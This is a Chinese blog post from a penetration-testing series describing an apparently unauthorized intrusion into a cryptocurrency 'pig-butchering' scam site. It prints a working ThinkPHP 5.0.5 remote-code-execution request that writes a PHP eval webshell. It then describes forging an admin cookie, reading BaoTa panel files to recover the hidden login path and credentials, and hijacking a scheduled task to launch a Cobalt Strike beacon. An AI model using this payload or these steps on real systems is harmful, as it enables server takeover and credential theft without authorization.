【渗透实战系列】19-杀猪盘渗透测试

  • A+
所属分类:安全文章

涉及知识点:

thinkphp5.0.5 漏洞利用cookie伪造登录账户密码泄露cobalt strike 木马应用

最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。

【渗透实战系列】19-杀猪盘渗透测试


为thinkphp5.0.5随用RCE进行打入,成功写入webshell。

s=index|thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数,且com和dl加载都不能用无法执行相应的系统命令如下所示:

【渗透实战系列】19-杀猪盘渗透测试

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open
//php如上系统命令都已禁用

但有文件的读写权限没有禁用assert(),file_put_contents()等函数,查看后发现为windows系统如下所示:


【渗透实战系列】19-杀猪盘渗透测试


由于php执行系统命令的函数都被禁用了,从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波,发现其管理员cookie固定且可以伪造如下所示看着像后门:

【渗透实战系列】19-杀猪盘渗透测试


故可后台登录绕过,管理员cookie固定,添加cookie字段即可登录绕过。浏览器f12,在cookie中添加上述键值访问index,即可成功后台登录如下所示好多钱(被骗的人好多):

【渗透实战系列】19-杀猪盘渗透测试


前台询问客服了解到转账账户(该杀猪盘运作方式是用户将钱打入客服提供的账号后,用户再在自己的账号冲入相应数值的资金至后台审核,审核后即可使用该数值的钱进行货币的涨跌投资买卖交易),留作证据上交:

【渗透实战系列】19-杀猪盘渗透测试


由于之前一直无法执行系统命令,想要突破一下就开始翻他服务器上的文件,翻阅系统文件发现存在宝塔的文件夹,探测发现确实开放8888端口存在宝塔服务但默认登录入口已被修改,如下所示:

【渗透实战系列】19-杀猪盘渗透测试


翻阅宝塔文件发现存储路径的文件名admin_path.pl,如下所示:

【渗透实战系列】19-杀猪盘渗透测试


找到宝塔登录入口,成功访问该登录入口,如下所示:

【渗透实战系列】19-杀猪盘渗透测试


继续翻阅发现一个default.pl的文件,该文件中存放的是相应的登录密码:

【渗透实战系列】19-杀猪盘渗透测试


拿到密码尝试了默认用户名发现不对不能登录,继续翻文件default.db文件是记录登录记录的,找到登录账号:

【渗透实战系列】19-杀猪盘渗透测试

利用账号密码成功登录宝塔管理后台,如下所示:利用账号密码成功登录宝塔管理后台,如下所示:

【渗透实战系列】19-杀猪盘渗透测试


找到定时任务处修改计划任务执行cs上线马,上线后在将计划任务改回如下所示:


【渗透实战系列】19-杀猪盘渗透测试

cs成功上线如下所示:

【渗透实战系列】19-杀猪盘渗透测试

查看ip仅有公网地址无内网,同C段还有其他几台部署的都是同一套东西就不在往下搞了:

【渗透实战系列】19-杀猪盘渗透测试

总的就这样,没啥东西比较无味。

作者:spider 

引用原文:https://xz.aliyun.com/t/8224

推荐阅读:



渗透实战系列


【渗透实战系列】18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

【渗透实战系列】19-杀猪盘渗透测试

长按-识别-关注

【渗透实战系列】19-杀猪盘渗透测试

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】19-杀猪盘渗透测试

点分享

【渗透实战系列】19-杀猪盘渗透测试

点收藏

【渗透实战系列】19-杀猪盘渗透测试

点点赞

【渗透实战系列】19-杀猪盘渗透测试

点在看

本文始发于微信公众号(Hacking黑白红):【渗透实战系列】19-杀猪盘渗透测试

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: